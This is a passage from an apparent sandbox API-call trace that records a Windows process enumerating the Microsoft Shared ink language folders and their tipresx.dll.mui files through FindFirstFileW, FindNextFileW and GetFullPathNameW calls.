ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.493] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.493] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0046.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", lpFilePart=0x0) returned 0x38 [0046.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\", lpFilePart=0x0) returned 0x39 [0046.493] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.494] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.494] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", lpFilePart=0x0) returned 0x3d [0046.494] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.494] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.494] CoTaskMemFree (pv=0x4fe370) [0046.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", lpFilePart=0x0) returned 0x3d [0046.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", lpFilePart=0x0) returned 0x3d [0046.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\", lpFilePart=0x0) returned 0x3e [0046.495] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.495] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.496] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.496] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui", lpFilePart=0x0) returned 0x4d [0046.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", lpFilePart=0x0) returned 0x3d [0046.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\", lpFilePart=0x0) returned 0x3e [0046.497] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.497] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.497] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\.", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", lpFilePart=0x0) returned 0x38 [0046.497] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.498] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.498] CoTaskMemFree (pv=0x4fe370) [0046.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", lpFilePart=0x0) returned 0x38 [0046.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", lpFilePart=0x0) returned 0x38 [0046.498] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.511] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.512] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.512] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.513] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.513] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.513] CoTaskMemFree (pv=0x4fe370) [0046.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.513] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.513] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.514] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.514] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.514] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.514] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.514] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.514] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8f46414, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe91a79e4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe91a79e4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.515] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.515] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.515] CoTaskMemFree (pv=0x4fe370) [0046.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.515] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.515] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.515] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6eb476, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a6eb476, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a6eb476, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.516] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.516] 